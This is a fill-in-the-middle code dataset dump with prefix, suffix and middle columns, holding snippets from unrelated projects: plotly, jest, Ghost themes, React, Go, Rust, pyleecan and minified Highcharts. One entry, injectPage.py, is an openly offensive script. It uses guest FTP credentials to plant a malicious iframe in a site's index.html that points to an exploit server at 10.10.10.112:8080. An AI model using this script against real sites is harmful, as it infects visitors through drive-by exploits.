file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
_tickangle.py
|
import _plotly_utils.basevalidators
class TickangleValidator(_plotly_utils.basevalidators.AngleValidator):
|
super(TickangleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs,
)
|
def __init__(
self, plotly_name="tickangle", parent_name="icicle.marker.colorbar", **kwargs
):
|
utils.test.ts
|
import * as utils from "../src/utils";
import * as os from "os";
describe("Get executable extension", () => {
|
expect(os.type).toBeCalled();
});
test("returns empty string for non-windows OS", () => {
jest.spyOn(os, "type").mockReturnValue("Darwin");
expect(utils.getExecutableExtension()).toBe("");
expect(os.type).toBeCalled();
jest.spyOn(os, "type").mockReturnValue("Other");
expect(utils.getExecutableExtension()).toBe("");
expect(os.type).toBeCalled();
});
});
|
test("returns .exe when os is Windows", () => {
jest.spyOn(os, "type").mockReturnValue("Windows_NT");
expect(utils.getExecutableExtension()).toBe(".exe");
|
002-comment-id.js
|
const _ = require('lodash');
const spec = require('../specs');
let checkCommentID;
checkCommentID = function checkCommentID(theme, options) {
const checkVersion = _.get(options, 'checkVersion', 'latest');
let ruleSet = spec.get([checkVersion]);
// CASE: 002-comment-id checks only needs `rules` that start with `GS002`
const ruleRegex = /GS002-.*/g;
|
}
});
_.each(ruleSet, function (check, ruleCode) {
_.each(theme.files, function (themeFile) {
var template = themeFile.file.match(/^[^/]+.hbs$/) || themeFile.file.match(/^partials[/\\]+(.*)\.hbs$/);
if (template) {
if (themeFile.content.match(check.regex)) {
if (!Object.prototype.hasOwnProperty.call(theme.results.fail, (ruleCode))) {
theme.results.fail[ruleCode] = {failures: []};
}
theme.results.fail[ruleCode].failures.push(
{
ref: themeFile.file
}
);
}
}
});
if (theme.results.pass.indexOf(ruleCode) === -1 && !Object.prototype.hasOwnProperty.call(theme.results.fail, ruleCode)) {
theme.results.pass.push(ruleCode);
}
});
return theme;
};
module.exports = checkCommentID;
|
ruleSet = _.pickBy(ruleSet.rules, function (rule, ruleCode) {
if (ruleCode.match(ruleRegex)) {
return rule;
|
menuLine.js
|
import React from 'react';
import MenuItem from './menuItem';
import store from '../store';
import {selectDisk} from '../actions/diskActions';
import {setActiveDisk} from '../actions/diskActions';
export default class MenuLine extends React.Component{
constructor(props) {
super();
}
componentDidMount()
{
//console.log("client Замаунтился, Ура!",this);
|
}
// При выборе клиента в списке меняем в Сторе форму редактирования
clickMeTender(){
console.log("Ткнули в кнопку-", this);
//store.dispatch(setActiveDisk(this.props.disk));
//store.dispatch(selectDisk(this.props.index));
//var i = store.getState()["selectedDisk"]; //делаем сдвиг индекса
//store.dispatch(setActiveDisk(store.getState()["AllDisks"][i]));
}
render(){
var ClassName;
// if(this.props.disk.id == store.getState()["activeDisk"].id){
// ClassName = "selected";
// } else ClassName = "tab";
ClassName = "tab";
return(
<div className="mainmenu">
<MenuItem value="Клиенты"/>
<MenuItem value="Диски"/>
<MenuItem value="Заказы"/>
<MenuItem value="Магазин"/>
<MenuItem value="Обзоры"/>
</div>
);
}
}
| |
slack.go
|
package slackcli
import (
"context"
"crypto/x509"
"fmt"
"time"
avcli "github.com/byuoitav/av-cli"
"github.com/slack-go/slack"
"go.uber.org/zap"
"google.golang.org/grpc"
)
type Client struct {
cli avcli.AvCliClient
cliToken string
slack *slack.Client
Log *zap.Logger
}
func New(ctx context.Context, cliAddr string, cliToken string, slackToken string) (*Client, error)
|
func (c *Client) handle(req slack.SlashCommand, user string, f func(auth auth) []slack.MsgOption) {
auth := auth{
token: c.cliToken,
user: user,
}
opts := []slack.MsgOption{
slack.MsgOptionResponseURL(req.ResponseURL, slack.ResponseTypeInChannel),
}
opts = append(opts, f(auth)...)
ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
defer cancel()
_, _, err := c.slack.PostMessageContext(ctx, req.ChannelID, opts...)
if err != nil {
c.Log.Warn("unable to post message to slack", zap.Error(err), zap.String("cmd", req.Command))
return
}
}
|
{
pool, err := x509.SystemCertPool()
if err != nil {
return nil, fmt.Errorf("unable to get system cert pool: %s", err)
}
conn, err := grpc.DialContext(ctx, cliAddr, getTransportSecurityDialOption(pool))
if err != nil {
return nil, fmt.Errorf("unable to connec to avcli API: %s", err)
}
return &Client{
cli: avcli.NewAvCliClient(conn),
cliToken: cliToken,
slack: slack.New(slackToken, slack.OptionDebug(true)),
}, nil
}
|
ArrowIosUp.tsx
|
/**
The MIT License (MIT)
*/
import { Props, createIcon } from '../Icon'
import React from 'react'
export default React.forwardRef((props: Props, ref: React.RefObject<HTMLSpanElement>) => (
createIcon(props, ref, {
filled: <path fillRule="evenodd" clipRule="evenodd" d="M17.9995 15C17.7735 15 17.5465 14.924 17.3595 14.768L11.9885 10.292L6.62651 14.607C6.19751 14.954 5.56751 14.886 5.22051 14.455C4.87451 14.025 4.94251 13.396 5.37351 13.049L11.3735 8.22098C11.7435 7.92198 12.2745 7.92598 12.6405 8.23198L18.6405 13.232C19.0645 13.585 19.1215 14.216 18.7685 14.64C18.5705 14.877 18.2865 15 17.9995 15Z"/>,
outline: <path fillRule="evenodd" clipRule="evenodd" d="M17.9995 15C17.7735 15 17.5465 14.924 17.3595 14.768L11.9885 10.292L6.62651 14.607C6.19751 14.954 5.56751 14.886 5.22051 14.455C4.87451 14.025 4.94251 13.396 5.37351 13.049L11.3735 8.22098C11.7435 7.92198 12.2745 7.92598 12.6405 8.23198L18.6405 13.232C19.0645 13.585 19.1215 14.216 18.7685 14.64C18.5705 14.877 18.2865 15 17.9995 15Z"/>,
|
))
|
})
|
Gen_PWSlot15.py
|
# -*- coding: utf-8 -*-
"""File generated according to PWSlot15/gen_list.json
WARNING! All changes made in this file will be lost!
"""
from pyleecan.GUI.Dialog.DMachineSetup.SWSlot.PWSlot15.Ui_PWSlot15 import Ui_PWSlot15
class Gen_PWSlot15(Ui_PWSlot15):
|
def setupUi(self, PWSlot15):
"""Abstract class to update the widget according to the csv doc"""
Ui_PWSlot15.setupUi(self, PWSlot15)
# Setup of in_W0
txt = self.tr(u"""Slot isthmus width.""")
self.in_W0.setWhatsThis(txt)
self.in_W0.setToolTip(txt)
# Setup of lf_W0
self.lf_W0.validator().setBottom(0)
txt = self.tr(u"""Slot isthmus width.""")
self.lf_W0.setWhatsThis(txt)
self.lf_W0.setToolTip(txt)
# Setup of unit_W0
txt = self.tr(u"""Slot isthmus width.""")
self.unit_W0.setWhatsThis(txt)
self.unit_W0.setToolTip(txt)
# Setup of in_W3
txt = self.tr(u"""Tooth width""")
self.in_W3.setWhatsThis(txt)
self.in_W3.setToolTip(txt)
# Setup of lf_W3
self.lf_W3.validator().setBottom(0)
txt = self.tr(u"""Tooth width""")
self.lf_W3.setWhatsThis(txt)
self.lf_W3.setToolTip(txt)
# Setup of unit_W3
txt = self.tr(u"""Tooth width""")
self.unit_W3.setWhatsThis(txt)
self.unit_W3.setToolTip(txt)
# Setup of in_H0
txt = self.tr(u"""Slot isthmus height.""")
self.in_H0.setWhatsThis(txt)
self.in_H0.setToolTip(txt)
# Setup of lf_H0
self.lf_H0.validator().setBottom(0)
txt = self.tr(u"""Slot isthmus height.""")
self.lf_H0.setWhatsThis(txt)
self.lf_H0.setToolTip(txt)
# Setup of unit_H0
txt = self.tr(u"""Slot isthmus height.""")
self.unit_H0.setWhatsThis(txt)
self.unit_H0.setToolTip(txt)
# Setup of in_H1
txt = self.tr(u"""Slot intermediate height.""")
self.in_H1.setWhatsThis(txt)
self.in_H1.setToolTip(txt)
# Setup of lf_H1
self.lf_H1.validator().setBottom(0)
txt = self.tr(u"""Slot intermediate height.""")
self.lf_H1.setWhatsThis(txt)
self.lf_H1.setToolTip(txt)
# Setup of unit_H1
txt = self.tr(u"""Slot intermediate height.""")
self.unit_H1.setWhatsThis(txt)
self.unit_H1.setToolTip(txt)
# Setup of in_H2
txt = self.tr(u"""Slot height""")
self.in_H2.setWhatsThis(txt)
self.in_H2.setToolTip(txt)
# Setup of lf_H2
self.lf_H2.validator().setBottom(0)
txt = self.tr(u"""Slot height""")
self.lf_H2.setWhatsThis(txt)
self.lf_H2.setToolTip(txt)
# Setup of unit_H2
txt = self.tr(u"""Slot height""")
self.unit_H2.setWhatsThis(txt)
self.unit_H2.setToolTip(txt)
# Setup of in_R1
txt = self.tr(u"""Top radius""")
self.in_R1.setWhatsThis(txt)
self.in_R1.setToolTip(txt)
# Setup of lf_R1
self.lf_R1.validator().setBottom(0)
txt = self.tr(u"""Top radius""")
self.lf_R1.setWhatsThis(txt)
self.lf_R1.setToolTip(txt)
# Setup of unit_R1
txt = self.tr(u"""Top radius""")
self.unit_R1.setWhatsThis(txt)
self.unit_R1.setToolTip(txt)
# Setup of in_R2
txt = self.tr(u"""Bottom radius""")
self.in_R2.setWhatsThis(txt)
self.in_R2.setToolTip(txt)
# Setup of lf_R2
self.lf_R2.validator().setBottom(0)
txt = self.tr(u"""Bottom radius""")
self.lf_R2.setWhatsThis(txt)
self.lf_R2.setToolTip(txt)
# Setup of unit_R2
txt = self.tr(u"""Bottom radius""")
self.unit_R2.setWhatsThis(txt)
self.unit_R2.setToolTip(txt)
|
|
unknown.rs
|
//! Unknown messages.
use bytes::{Buf, BufMut};
use crate::{wire_format::WireFormat, SbpMessage};
/// The message returned by the parser when the message type does not correspond to a known message.
#[cfg_attr(feature = "serde", derive(serde::Serialize, serde::Deserialize))]
#[derive(Debug, Clone)]
pub struct Unknown {
/// The message id of the message.
pub msg_id: u16,
/// The message sender_id.
pub sender_id: Option<u16>,
/// Raw payload of the message.
pub payload: Vec<u8>,
}
impl SbpMessage for Unknown {
fn message_name(&self) -> &'static str {
"UNKNOWN"
}
fn message_type(&self) -> u16 {
self.msg_id
}
fn sender_id(&self) -> Option<u16>
|
fn set_sender_id(&mut self, new_id: u16) {
self.sender_id = Some(new_id);
}
fn encoded_len(&self) -> usize {
WireFormat::len(self) + crate::HEADER_LEN + crate::CRC_LEN
}
}
impl WireFormat for Unknown {
fn len(&self) -> usize {
self.payload.len()
}
fn write<B: BufMut>(&self, buf: &mut B) {
self.payload.write(buf)
}
fn parse_unchecked<B: Buf>(buf: &mut B) -> Self {
Unknown {
msg_id: 0,
sender_id: None,
payload: WireFormat::parse_unchecked(buf),
}
}
}
|
{
self.sender_id
}
|
injectPage.py
|
#!/usr/bin/env python
import ftplib
def
|
():
print " ##### Malicious Inject p61 #####"
print " There is some use of Metasploit in this "
print " section that warrants a good read. "
def injectPage(ftp, page, redirect):
f = open(Page + '.tmp', 'w')
ftp.retrlines('RETR ' +page., f.write)
print '[+] Downloaded Page: '+page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: '+page
ftp.storlines('STOR '+page, open(page+ '.tmp'))
print '[+] Uploaded Injected Page: '+page
host = '192.168.95.179'
userName = 'guest'
passWord = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = '<iframe src='+'"http://10.10.10.112:8080/exploit"></iframe>'
injectPage(ftp, 'index.html', redirect)
|
banner
|
hicharts.custom.js
|
/*
@product.name@ JS [email protected]@ (@product.date@)
(c) 2009-2014 Torstein Honsi
License: www.highcharts.com/license
@product.name@ JS [email protected]@ (@product.date@)
Plugin for displaying a message when there is no data visible in chart.
(c) 2010-2014 Highsoft AS
Author: Oystein Moseng
License: www.highcharts.com/license
*/
(function(){function t(a,b){var c;a||(a={});for(c in b)a[c]=b[c];return a}function E(){var a,b=arguments,c,d={},e=function(a,b){var c,d;"object"!==typeof a&&(a={});for(d in b)b.hasOwnProperty(d)&&((c=b[d])&&"object"===typeof c&&"[object Array]"!==Object.prototype.toString.call(c)&&"renderTo"!==d&&"number"!==typeof c.nodeType?a[d]=e(a[d]||{},c):a[d]=b[d]);return a};!0===b[0]&&(d=b[1],b=Array.prototype.slice.call(b,2));c=b.length;for(a=0;a<c;a++)d=e(d,b[a]);return d}function A(a,b){return parseInt(a,
b||10)}function U(a){return"string"===typeof a}function V(a){return"object"===typeof a}function ka(a){return"[object Array]"===Object.prototype.toString.call(a)}function $(a){return"number"===typeof a}function aa(a){return Q.log(a)/Q.LN10}function L(a){return Q.pow(10,a)}function oa(a,b){for(var c=a.length;c--;)if(a[c]===b){a.splice(c,1);break}}function u(a){return a!==v&&null!==a}function G(a,b,c){var d,e;if(U(b))u(c)?a.setAttribute(b,c):a&&a.getAttribute&&(e=a.getAttribute(b));else if(u(b)&&V(b))for(d in b)a.setAttribute(d,
b[d]);return e}function ha(a){return ka(a)?a:[a]}function r(){var a=arguments,b,c,d=a.length;for(b=0;b<d;b++)if(c=a[b],"undefined"!==typeof c&&null!==c)return c}function X(a,b){pa&&!ba&&b&&b.opacity!==v&&(b.filter="alpha(opacity="+100*b.opacity+")");t(a.style,b)}function ta(a,b,c,d,e){a=y.createElement(a);b&&t(a,b);e&&X(a,{padding:0,border:ca,margin:0});c&&X(a,c);d&&d.appendChild(a);return a}function bb(a,b){var c=function(){};c.prototype=new a;t(c.prototype,b);return c}function qa(a,b,c,d){var e=
I.lang;a=+a||0;var f=-1===b?(a.toString().split(".")[1]||"").length:isNaN(b=R(b))?2:b;b=void 0===c?e.decimalPoint:c;d=void 0===d?e.thousandsSep:d;e=0>a?"-":"";c=String(A(a=R(a).toFixed(f)));var g=3<c.length?c.length%3:0;return e+(g?c.substr(0,g)+d:"")+c.substr(g).replace(/(\d{3})(?=\d)/g,"$1"+d)+(f?b+R(a-c).toFixed(f).slice(2):"")}function ra(a,b){return Array((b||2)+1-String(a).length).join(0)+a}function cb(a,b,c){var d=a[b];a[b]=function(){var a=Array.prototype.slice.call(arguments);a.unshift(d);
return c.apply(this,a)}}function ua(a,b){for(var c="{",d=!1,e,f,g,h,k,l=[];-1!==(c=a.indexOf(c));){e=a.slice(0,c);if(d){f=e.split(":");g=f.shift().split(".");k=g.length;e=b;for(h=0;h<k;h++)e=e[g[h]];f.length&&(f=f.join(":"),g=/\.([0-9])/,h=I.lang,k=void 0,/f$/.test(f)?(k=(k=f.match(g))?k[1]:-1,null!==e&&(e=qa(e,k,h.decimalPoint,-1<f.indexOf(",")?h.thousandsSep:""))):e=Ka(f,e))}l.push(e);a=a.slice(c+1);c=(d=!d)?"}":"{"}l.push(a);return l.join("")}function db(a){return Q.pow(10,F(Q.log(a)/Q.LN10))}
function eb(a,b,c,d){var e;c=r(c,1);e=a/c;b||(b=[1,2,2.5,5,10],d&&!1===d.allowDecimals&&(1===c?b=[1,2,5,10]:0.1>=c&&(b=[1/c])));for(d=0;d<b.length&&!(a=b[d],e<=(b[d]+(b[d+1]||b[d]))/2);d++);return a*c}function sb(){this.symbol=this.color=0}function fb(a,b){var c=a.length,d,e;for(e=0;e<c;e++)a[e].ss_i=e;a.sort(function(a,c){d=b(a,c);return 0===d?a.ss_i-c.ss_i:d});for(e=0;e<c;e++)delete a[e].ss_i}function va(a){for(var b=a.length,c=a[0];b--;)a[b]<c&&(c=a[b]);return c}function la(a){for(var b=a.length,
c=a[0];b--;)a[b]>c&&(c=a[b]);return c}function Da(a,b){for(var c in a)a[c]&&a[c]!==b&&a[c].destroy&&a[c].destroy(),delete a[c]}function La(a){Ma||(Ma=ta(tb));a&&Ma.appendChild(a);Ma.innerHTML=""}function fa(a,b){var c="Highcharts error #"+a+": www.highcharts.com/errors/"+a;if(b)throw c;O.console&&console.log(c)}function ia(a){return parseFloat(a.toPrecision(14))}function ub(){var a=I.global.useUTC,b=a?"getUTC":"get",c=a?"setUTC":"set";wa=6E4*(a&&I.global.timezoneOffset||0);Na=a?Date.UTC:function(a,
b,c,g,h,k){return(new Date(a,b,r(c,1),r(g,0),r(h,0),r(k,0))).getTime()};gb=b+"Minutes";hb=b+"Hours";ib=b+"Day";Ea=b+"Date";Oa=b+"Month";Pa=b+"FullYear";vb=c+"Minutes";wb=c+"Hours";jb=c+"Date";xb=c+"Month";yb=c+"FullYear"}function W(){}function xa(a,b,c,d){this.axis=a;this.pos=b;this.type=c||"";this.isNew=!0;c||d||this.addLabel()}function sa(){this.init.apply(this,arguments)}function Qa(){this.init.apply(this,arguments)}var v,y=document,O=window,Q=Math,z=Q.round,F=Q.floor,ya=Q.ceil,x=Q.max,J=Q.min,
R=Q.abs,Fa=Q.cos,Ra=Q.sin,zb=Q.PI,Ab=2*zb/360,ma=navigator.userAgent,Jb=O.opera,pa=/msie/i.test(ma)&&!Jb,Bb=/AppleWebKit/.test(ma),Sa=/Firefox/.test(ma),Cb=/(Mobile|Android|Windows Phone)/.test(ma),ja="http://www.w3.org/2000/svg",ba=!!y.createElementNS&&!!y.createElementNS(ja,"svg").createSVGRect,Kb=Sa&&4>parseInt(ma.split("Firefox/")[1],10),da=!ba&&!pa&&!!y.createElement("canvas").getContext,Ta,Ga,Db={},kb=0,Ma,I,Ka,ea,lb,B,Lb=function(){},Y=[],Ha=0,tb="div",ca="none",Mb=/^[0-9]+$/,Nb="stroke-width",
Na,wa,gb,hb,ib,Ea,Oa,Pa,vb,wb,jb,xb,yb,M={},S=O.Highcharts=O.Highcharts?fa(16,!0):{};Ka=function(a,b,c){if(!u(b)||isNaN(b))return"Invalid date";a=r(a,"%Y-%m-%d %H:%M:%S");var d=new Date(b-wa),e,f=d[hb](),g=d[ib](),h=d[Ea](),k=d[Oa](),l=d[Pa](),m=I.lang,n=m.weekdays,d=t({a:n[g].substr(0,3),A:n[g],d:ra(h),e:h,b:m.shortMonths[k],B:m.months[k],m:ra(k+1),y:l.toString().substr(2,2),Y:l,H:ra(f),I:ra(f%12||12),l:f%12||12,M:ra(d[gb]()),p:12>f?"AM":"PM",P:12>f?"am":"pm",S:ra(d.getSeconds()),L:ra(z(b%1E3),3)},
S.dateFormats);for(e in d)for(;-1!==a.indexOf("%"+e);)a=a.replace("%"+e,"function"===typeof d[e]?d[e](b):d[e]);return c?a.substr(0,1).toUpperCase()+a.substr(1):a};sb.prototype={wrapColor:function(a){this.color>=a&&(this.color=0)},wrapSymbol:function(a){this.symbol>=a&&(this.symbol=0)}};B=function(){for(var a=0,b=arguments,c=b.length,d={};a<c;a++)d[b[a++]]=b[a];return d}("millisecond",1,"second",1E3,"minute",6E4,"hour",36E5,"day",864E5,"week",6048E5,"month",26784E5,"year",31556952E3);lb={init:function(a,
b,c){b=b||"";var d=a.shift,e=-1<b.indexOf("C"),f=e?7:3,g;b=b.split(" ");c=[].concat(c);var h,k,l=function(a){for(g=a.length;g--;)"M"===a[g]&&a.splice(g+1,0,a[g+1],a[g+2],a[g+1],a[g+2])};e&&(l(b),l(c));a.isArea&&(h=b.splice(b.length-6,6),k=c.splice(c.length-6,6));if(d<=c.length/f&&b.length===c.length)for(;d--;)c=[].concat(c).splice(0,f).concat(c);a.shift=0;if(b.length)for(a=c.length;b.length<a;)d=[].concat(b).splice(b.length-f,f),e&&(d[f-6]=d[f-2],d[f-5]=d[f-1]),b=b.concat(d);h&&(b=b.concat(h),c=c.concat(k));
return[b,c]},step:function(a,b,c,d){var e=[],f=a.length;if(1===c)e=d;else if(f===b.length&&1>c)for(;f--;)d=parseFloat(a[f]),e[f]=isNaN(d)?a[f]:c*parseFloat(b[f]-d)+d;else e=b;return e}};(function(a){O.HighchartsAdapter=O.HighchartsAdapter||a&&{init:function(b){var c=a.fx,d=c.step,e,f=a.Tween,g=f&&f.propHooks;e=a.cssHooks.opacity;a.extend(a.easing,{easeOutQuad:function(a,b,c,d,e){return-d*(b/=e)*(b-2)+c}});a.each(["cur","_default","width","height","opacity"],function(a,b){var e=d,m;"cur"===b?e=c.prototype:
"_default"===b&&f&&(e=g[b],b="set");(m=e[b])&&(e[b]=function(c){var d;c=a?c:this;if("align"!==c.prop)return d=c.elem,d.attr?d.attr(c.prop,"cur"===b?v:c.now):m.apply(this,arguments)})});cb(e,"get",function(a,b,c){return b.attr?b.opacity||0:a.call(this,b,c)});e=function(a){var c=a.elem,d;a.started||(d=b.init(c,c.d,c.toD),a.start=d[0],a.end=d[1],a.started=!0);c.attr("d",b.step(a.start,a.end,a.pos,c.toD))};f?g.d={set:e}:d.d=e;this.each=Array.prototype.forEach?function(a,b){return Array.prototype.forEach.call(a,
b)}:function(a,b){for(var c=0,d=a.length;c<d;c++)if(!1===b.call(a[c],a[c],c,a))return c};a.fn.highcharts=function(){var a="Chart",b=arguments,c,d;this[0]&&(U(b[0])&&(a=b[0],b=Array.prototype.slice.call(b,1)),c=b[0],c!==v&&(c.chart=c.chart||{},c.chart.renderTo=this[0],new S[a](c,b[1]),d=this),c===v&&(d=Y[G(this[0],"data-highcharts-chart")]));return d}},getScript:a.getScript,inArray:a.inArray,adapterRun:function(b,c){return a(b)[c]()},grep:a.grep,map:function(a,c){for(var d=[],e=0,f=a.length;e<f;e++)d[e]=
c.call(a[e],a[e],e,a);return d},offset:function(b){return a(b).offset()},addEvent:function(b,c,d){a(b).bind(c,d)},removeEvent:function(b,c,d){var e=y.removeEventListener?"removeEventListener":"detachEvent";y[e]&&b&&!b[e]&&(b[e]=function(){});a(b).unbind(c,d)},fireEvent:function(b,c,d,e){var f=a.Event(c),g="detached"+c,h;!pa&&d&&(delete d.layerX,delete d.layerY,delete d.returnValue);t(f,d);b[c]&&(b[g]=b[c],b[c]=null);a.each(["preventDefault","stopPropagation"],function(a,b){var c=f[b];f[b]=function(){try{c.call(f)}catch(a){"preventDefault"===
b&&(h=!0)}}});a(b).trigger(f);b[g]&&(b[c]=b[g],b[g]=null);!e||f.isDefaultPrevented()||h||e(f)},washMouseEvent:function(a){var c=a.originalEvent||a;c.pageX===v&&(c.pageX=a.pageX,c.pageY=a.pageY);return c},animate:function(b,c,d){var e=a(b);b.style||(b.style={});c.d&&(b.toD=c.d,c.d=1);e.stop();c.opacity!==v&&b.attr&&(c.opacity+="px");e.animate(c,d)},stop:function(b){a(b).stop()}}})(O.jQuery);var Ua=O.HighchartsAdapter,Z=Ua||{};Ua&&Ua.init.call(Ua,lb);var Va=Z.adapterRun,Ob=Z.getScript,Wa=Z.inArray,
s=Z.each,mb=Z.grep,Pb=Z.offset,Xa=Z.map,N=Z.addEvent,T=Z.removeEvent,C=Z.fireEvent,Qb=Z.washMouseEvent,Eb=Z.animate,Ya=Z.stop,nb={enabled:!0,x:0,y:15,style:{color:"#606060",cursor:"default",fontSize:"11px"}};I={colors:"#7cb5ec #434348 #90ed7d #f7a35c #8085e9 #f15c80 #e4d354 #8085e8 #8d4653 #91e8e1".split(" "),symbols:["circle","diamond","square","triangle","triangle-down"],lang:{loading:"Loading...",months:"January February March April May June July August September October November December".split(" "),
|
backgroundColor:"white",opacity:0.5,textAlign:"center"}},tooltip:{enabled:!0,animation:ba,backgroundColor:"rgba(249, 249, 249, .85)",borderWidth:1,borderRadius:3,dateTimeLabelFormats:{millisecond:"%A, %b %e, %H:%M:%S.%L",second:"%A, %b %e, %H:%M:%S",minute:"%A, %b %e, %H:%M",hour:"%A, %b %e, %H:%M",day:"%A, %b %e, %Y",week:"Week from %A, %b %e, %Y",month:"%B %Y",year:"%Y"},headerFormat:'<span style="font-size: 10px">{point.key}</span><br/>',pointFormat:'<span style="color:{series.color}">\u25cf</span> {series.name}: <b>{point.y}</b><br/>',
shadow:!0,snap:Cb?25:10,style:{color:"#333333",cursor:"default",fontSize:"12px",padding:"8px",whiteSpace:"nowrap"}},credits:{enabled:!0,text:"Highcharts.com",href:"http://www.highcharts.com",position:{align:"right",x:-10,verticalAlign:"bottom",y:-5},style:{cursor:"pointer",color:"#909090",fontSize:"9px"}}};var za=I.plotOptions,Rb=za.line;ub();var Sb=/rgba\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]?(?:\.[0-9]+)?)\s*\)/,Tb=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/,
Ub=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/,Aa=function(a){var b=[],c,d;(function(a){a&&a.stops?d=Xa(a.stops,function(a){return Aa(a[1])}):(c=Sb.exec(a))?b=[A(c[1]),A(c[2]),A(c[3]),parseFloat(c[4],10)]:(c=Tb.exec(a))?b=[A(c[1],16),A(c[2],16),A(c[3],16),1]:(c=Ub.exec(a))&&(b=[A(c[1]),A(c[2]),A(c[3]),1])})(a);return{get:function(c){var f;d?(f=E(a),f.stops=[].concat(f.stops),s(d,function(a,b){f.stops[b]=[f.stops[b][0],a.get(c)]})):f=b&&!isNaN(b[0])?"rgb"===c?"rgb("+b[0]+","+
b[1]+","+b[2]+")":"a"===c?b[3]:"rgba("+b.join(",")+")":a;return f},brighten:function(a){if(d)s(d,function(b){b.brighten(a)});else if($(a)&&0!==a){var c;for(c=0;3>c;c++)b[c]+=A(255*a),0>b[c]&&(b[c]=0),255<b[c]&&(b[c]=255)}return this},rgba:b,setOpacity:function(a){b[3]=a;return this}}};W.prototype={init:function(a,b){this.element="span"===b?ta(b):y.createElementNS(ja,b);this.renderer=a},opacity:1,animate:function(a,b,c){b=r(b,ea,!0);Ya(this);b?(b=E(b,{}),c&&(b.complete=c),Eb(this,a,b)):(this.attr(a),
c&&c())},colorGradient:function(a,b,c){var d=this.renderer,e,f,g,h,k,l,m,n,q,p,w=[];a.linearGradient?f="linearGradient":a.radialGradient&&(f="radialGradient");if(f){g=a[f];h=d.gradients;l=a.stops;q=c.radialReference;ka(g)&&(a[f]=g={x1:g[0],y1:g[1],x2:g[2],y2:g[3],gradientUnits:"userSpaceOnUse"});"radialGradient"===f&&q&&!u(g.gradientUnits)&&(g=E(g,{cx:q[0]-q[2]/2+g.cx*q[2],cy:q[1]-q[2]/2+g.cy*q[2],r:g.r*q[2],gradientUnits:"userSpaceOnUse"}));for(p in g)"id"!==p&&w.push(p,g[p]);for(p in l)w.push(l[p]);
w=w.join(",");h[w]?a=h[w].attr("id"):(g.id=a="highcharts-"+kb++,h[w]=k=d.createElement(f).attr(g).add(d.defs),k.stops=[],s(l,function(a){0===a[1].indexOf("rgba")?(e=Aa(a[1]),m=e.get("rgb"),n=e.get("a")):(m=a[1],n=1);a=d.createElement("stop").attr({offset:a[0],"stop-color":m,"stop-opacity":n}).add(k);k.stops.push(a)}));c.setAttribute(b,"url("+d.url+"#"+a+")")}},attr:function(a,b){var c,d,e=this.element,f,g=this,h;"string"===typeof a&&b!==v&&(c=a,a={},a[c]=b);if("string"===typeof a)g=(this[a+"Getter"]||
this._defaultGetter).call(this,a,e);else{for(c in a)d=a[c],h=!1,this.symbolName&&/^(x|y|width|height|r|start|end|innerR|anchorX|anchorY)/.test(c)&&(f||(this.symbolAttr(a),f=!0),h=!0),!this.rotation||"x"!==c&&"y"!==c||(this.doTransform=!0),h||(this[c+"Setter"]||this._defaultSetter).call(this,d,c,e),this.shadows&&/^(width|height|visibility|x|y|d|transform|cx|cy|r)$/.test(c)&&this.updateShadows(c,d);this.doTransform&&(this.updateTransform(),this.doTransform=!1)}return g},updateShadows:function(a,b){for(var c=
this.shadows,d=c.length;d--;)c[d].setAttribute(a,"height"===a?x(b-(c[d].cutHeight||0),0):"d"===a?this.d:b)},addClass:function(a){var b=this.element,c=G(b,"class")||"";-1===c.indexOf(a)&&G(b,"class",c+" "+a);return this},symbolAttr:function(a){var b=this;s("x y r start end width height innerR anchorX anchorY".split(" "),function(c){b[c]=r(a[c],b[c])});b.attr({d:b.renderer.symbols[b.symbolName](b.x,b.y,b.width,b.height,b)})},clip:function(a){return this.attr("clip-path",a?"url("+this.renderer.url+"#"+
a.id+")":ca)},crisp:function(a){var b,c={},d,e=a.strokeWidth||this.strokeWidth||this.attr&&this.attr("stroke-width")||0;d=z(e)%2/2;a.x=F(a.x||this.x||0)+d;a.y=F(a.y||this.y||0)+d;a.width=F((a.width||this.width||0)-2*d);a.height=F((a.height||this.height||0)-2*d);a.strokeWidth=e;for(b in a)this[b]!==a[b]&&(this[b]=c[b]=a[b]);return c},css:function(a){var b=this.styles,c={},d=this.element,e,f,g="";e=!b;a&&a.color&&(a.fill=a.color);if(b)for(f in a)a[f]!==b[f]&&(c[f]=a[f],e=!0);if(e){e=this.textWidth=
a&&a.width&&"text"===d.nodeName.toLowerCase()&&A(a.width);b&&(a=t(b,c));this.styles=a;e&&(da||!ba&&this.renderer.forExport)&&delete a.width;if(pa&&!ba)X(this.element,a);else{b=function(a,b){return"-"+b.toLowerCase()};for(f in a)g+=f.replace(/([A-Z])/g,b)+":"+a[f]+";";G(d,"style",g)}e&&this.added&&this.renderer.buildText(this)}return this},on:function(a,b){var c=this,d=c.element;Ga&&"click"===a?(d.ontouchstart=function(a){c.touchEventFired=Date.now();a.preventDefault();b.call(d,a)},d.onclick=function(a){(-1===
ma.indexOf("Android")||1100<Date.now()-(c.touchEventFired||0))&&b.call(d,a)}):d["on"+a]=b;return this},setRadialReference:function(a){this.element.radialReference=a;return this},translate:function(a,b){return this.attr({translateX:a,translateY:b})},invert:function(){this.inverted=!0;this.updateTransform();return this},updateTransform:function(){var a=this.translateX||0,b=this.translateY||0,c=this.scaleX,d=this.scaleY,e=this.inverted,f=this.rotation,g=this.element;e&&(a+=this.attr("width"),b+=this.attr("height"));
